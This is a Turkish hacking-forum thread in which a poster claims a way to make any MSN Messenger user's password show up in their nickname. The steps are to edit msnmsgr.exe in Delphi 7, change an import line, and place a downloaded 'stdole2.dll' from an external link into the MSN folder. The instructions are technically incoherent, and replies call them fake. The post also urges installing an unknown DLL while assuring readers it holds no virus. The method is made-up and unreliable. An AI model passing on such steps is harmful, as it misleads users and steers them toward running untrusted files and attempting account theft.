{Msn'de Çığır...Bakmayan Pişman.Sonra Üzülmeyin.}...:::ҳ̸Ҳ̸ҳ DaTa ҳ̸Ҳ̸ҳ:::...

DaTa

Yeni üye
11 Ağu 2007
25
0
HaCK’lemek

İstediğiniz Kişinin Nick’inde

Şifresi

Yazsın

-Arkadaşlar bu yöntemi yapıncaya kadar canım çıktı.Ama yaptım.

-Şimdi gelelim sadece '' C '' sürücüsünde '' MSN Massenger '' klasörünün içinde '' msnmsgr.exe '' bir '' .exe '' dosyası var.Bunu Delphi 7 ' de çalıştırın.Sonra '' Code '' kısmından Msn'nin dosyaları ile oynamaya başlıyoruz.
Şu kodu:
''inportlib(''stdole2.tlb'') ''

Bu şekilde değiştirin :

‘’ inportlib(''stdole2.dll'') ‘’

Arkadaşlar '' stdole2.dll '' diye bir '' .dll '' biliyorsunuz ki Msn'de yok.Ama ben onuda yaptım.Bu dosya olmadan nickte şifreyi göremezsiniz haberiniz olsun.Merak etmeyin bir tane virus yok.Devam edelim biz.Bu '' .dll ''dosyasını '' MSN Massenger '' in ana klasörün içine yerleştirin.Sonra gelsin şifreler.

Stdole2.dll Download: http://uploaded.to/?id=42gax2

Delphi 7 : Bu programı siz bulun artık.Şimdi versem yasal mı değil mi onu bilmiyorum.

Delphi 7 kullanmasaını bilmeyenlerden özür diliyorum.

Bu kadar...İnsallah +repler gelir..
Bu arda inanmayanlar olabilir ama ben becerdim.Belki herkeste bu olay olmayabilir...

İşte Hack Budur...

ҳ̸Ҳ̸ҳ DaTa ҳ̸Ҳ̸ҳ

Son düzenleme:

_TheEnD_

Uzman üye
7 Nis 2007
1,813
41
Hiçbekistan..
Delphi 7 Programmı:S OLucak mı bilmiyorum ama hacklediğine eminsin inş. bu yolla.. Ayrıca kendi MSN Messenger klasörümüzü açıyoruz başkalarının kini nasıl hacklicez..

GeNeRaL-33

Uzman üye
19 Tem 2007
1,365
37
255.244.233.1
kardesım madem boyle guzel bı paylasım yapıosn.nıe nasıl kullancagımız hakkında bılgı veren bır lınk vermıyosun ..

adszfc4.jpg

https://tik.lat/Jcfeb

starallways22

Yeni üye
25 Tem 2008
21
0
mal kendi msn tag ınla nasıl yapıyon fake :D kendi tag ınla ypıyo olsa staff ları ve adminleri hacklerdim heheh komiksin

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.